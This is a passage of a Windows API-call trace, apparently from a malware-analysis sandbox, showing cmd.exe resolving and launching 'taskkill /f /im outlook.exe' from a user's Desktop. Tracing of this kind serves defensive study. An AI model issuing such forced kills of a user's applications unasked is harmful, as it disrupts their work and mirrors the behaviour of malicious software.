lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.310] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.310] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.310] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.310] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.310] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.310] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.310] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.310] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.310] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.310] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.310] GetProcessHeap () returned 0x460000 [0060.310] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472b18 | out: hHeap=0x460000) returned 1 [0060.310] GetEnvironmentStringsW () returned 0x472258* [0060.310] GetProcessHeap () returned 0x460000 [0060.310] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae2) returned 0x474bb8 [0060.311] FreeEnvironmentStringsW (penv=0x472258) returned 1 [0060.311] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.311] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.311] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.311] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.311] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.311] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.311] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.311] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.311] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.311] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.311] GetProcessHeap () returned 0x460000 [0060.311] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x4756a8 [0060.311] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ef61c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.311] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ef61c, lpFilePart=0x3ef618 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef618*="Desktop") returned 0x25 [0060.311] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.311] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ef398 | out: lpFindFileData=0x3ef398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x471ec0 [0060.311] FindClose (in: hFindFile=0x471ec0 | out: hFindFile=0x471ec0) returned 1 [0060.311] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ef398 | out: lpFindFileData=0x3ef398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x471ec0 [0060.311] FindClose (in: hFindFile=0x471ec0 | out: hFindFile=0x471ec0) returned 1 [0060.312] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ef398 | out: lpFindFileData=0x3ef398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x471ec0 [0060.312] FindClose (in: hFindFile=0x471ec0 | out: hFindFile=0x471ec0) returned 1 [0060.312] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.312] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.312] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.312] GetProcessHeap () returned 0x460000 [0060.312] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474bb8 | out: hHeap=0x460000) returned 1 [0060.312] GetEnvironmentStringsW () returned 0x4740c8* [0060.312] GetProcessHeap () returned 0x460000 [0060.312] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x475f08 [0060.312] FreeEnvironmentStringsW (penv=0x4740c8) returned 1 [0060.312] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.312] GetProcessHeap () returned 0x460000 [0060.312] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4756a8 | out: hHeap=0x460000) returned 1 [0060.312] GetProcessHeap () returned 0x460000 [0060.312] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x476a48 [0060.313] GetProcessHeap () returned 0x460000 [0060.313] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x44) returned 0x471ec0 [0060.313] GetProcessHeap () returned 0x460000 [0060.313] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476a48 | out: hHeap=0x460000) returned 1 [0060.313] GetConsoleOutputCP () returned 0x1b5 [0060.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.313] GetUserDefaultLCID () returned 0x409 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ef75c, cchData=128 | out: lpLCData="0") returned 2 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ef75c, cchData=128 | out: lpLCData="0") returned 2 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ef75c, cchData=128 | out: lpLCData="1") returned 2 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.314] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.315] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.315] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.316] GetProcessHeap () returned 0x460000 [0060.316] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x472dd0 [0060.316] GetConsoleTitleW (in: lpConsoleTitle=0x472dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.316] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.316] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.316] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.316] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.317] GetProcessHeap () returned 0x460000 [0060.317] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x476a48 [0060.317] GetProcessHeap () returned 0x460000 [0060.317] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476a48 | out: hHeap=0x460000) returned 1 [0060.318] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.318] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.318] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.318] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.318] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.318] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.318] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.318] GetProcessHeap () returned 0x460000 [0060.318] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x472fe8 [0060.318] GetProcessHeap () returned 0x460000 [0060.318] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x475748 [0060.318] GetProcessHeap () returned 0x460000 [0060.318] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x30) returned 0x473048 [0060.319] GetConsoleTitleW (in: lpConsoleTitle=0x3ef454, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.319] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.319] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.319] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.319] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.320] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.320] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.320] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.320] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.320] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.320] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.320] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.320] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.320] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.320] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.320] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.320] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.320] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.320] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.320] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.320] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.320] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.320] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.320] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.320] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.320] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.320] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.320] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.320] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.320] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.320] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.320] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.320] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.320] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.320] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.320] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.320] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.320] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.320] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.320] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.320] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.320] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.321] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.321] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.321] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.321] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.321] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.321] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.321] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.321] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.321] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.321] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.321] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.321] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.321] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.321] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.321] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.321] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.321] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.321] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.321] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.321] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.321] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.321] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.321] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.321] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.322] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.322] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.322] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.322] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.322] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.322] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.322] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.322] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.322] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.322] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.322] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.322] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.322] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.322] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.322] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.322] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.322] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.322] GetProcessHeap () returned 0x460000 [0060.322] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x473080 [0060.322] GetProcessHeap () returned 0x460000 [0060.322] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x42) returned 0x473298 [0060.322] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.323] GetProcessHeap () returned 0x460000 [0060.323] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x4607f0 [0060.323] SetErrorMode (uMode=0x0) returned 0x0 [0060.323] SetErrorMode (uMode=0x1) returned 0x0 [0060.323] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4607f8, lpFilePart=0x3eef74 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3eef74*="Desktop") returned 0x25 [0060.323] SetErrorMode (uMode=0x0) returned 0x1 [0060.323] GetProcessHeap () returned 0x460000 [0060.323] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4607f0, Size=0x66) returned 0x4607f0 [0060.323] GetProcessHeap () returned 0x460000 [0060.323] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4607f0) returned 0x66 [0060.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.323] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.323] GetProcessHeap () returned 0x460000 [0060.323] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x4732e8 [0060.323] GetProcessHeap () returned 0x460000 [0060.323] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x460860 [0060.329] GetProcessHeap () returned 0x460000 [0060.329] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x460860, Size=0x122) returned 0x460860 [0060.329] GetProcessHeap () returned 0x460000 [0060.329] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x460860) returned 0x122 [0060.329] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.329] GetProcessHeap () returned 0x460000 [0060.329] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x473410 [0060.329] GetProcessHeap () returned 0x460000 [0060.329] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x473410, Size=0x76) returned 0x473410 [0060.330] GetProcessHeap () returned 0x460000 [0060.330] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x473410) returned 0x76 [0060.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.331] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x3eecf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eecf0) returned 0xffffffff [0060.332] GetLastError () returned 0x2 [0060.332] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x3eecf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eecf0) returned 0xffffffff [0060.332] GetLastError () returned 0x2 [0060.332] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x3eecf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eecf0) returned 0x473490 [0060.332] GetProcessHeap () returned 0x460000 [0060.332] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x4734d0 [0060.332] FindClose (in: hFindFile=0x473490 | out: hFindFile=0x473490) returned 1 [0060.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x3eecf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eecf0) returned 0xffffffff [0060.332] GetLastError () returned 0x2 [0060.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x3eecf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eecf0) returned 0x473490 [0060.332] GetProcessHeap () returned 0x460000 [0060.332] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4734d0, Size=0x4) returned 0x4734d0 [0060.332] FindClose (in: hFindFile=0x473490 | out: hFindFile=0x473490) returned 1 [0060.333] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.333] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.333] GetConsoleTitleW (in: lpConsoleTitle=0x3ef1e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.333] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ef070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ef138 | out: lpAttributeList=0x3ef070, lpSize=0x3ef138) returned 1 [0060.333] UpdateProcThreadAttribute (in: lpAttributeList=0x3ef070, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ef130, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ef070, lpPreviousValue=0x0) returned 1 [0060.333] GetStartupInfoW (in: lpStartupInfo=0x3ef02c | out: lpStartupInfo=0x3ef02c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.333] GetProcessHeap () returned 0x460000 [0060.333] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x473490 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.333] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.334] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.334] GetProcessHeap () returned 0x460000 [0060.334] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x473490 | out: hHeap=0x460000) returned 1 [0060.334] GetProcessHeap () returned 0x460000 [0060.334] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa) returned 0x46ff18 [0060.334] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.335] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im outlook.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, 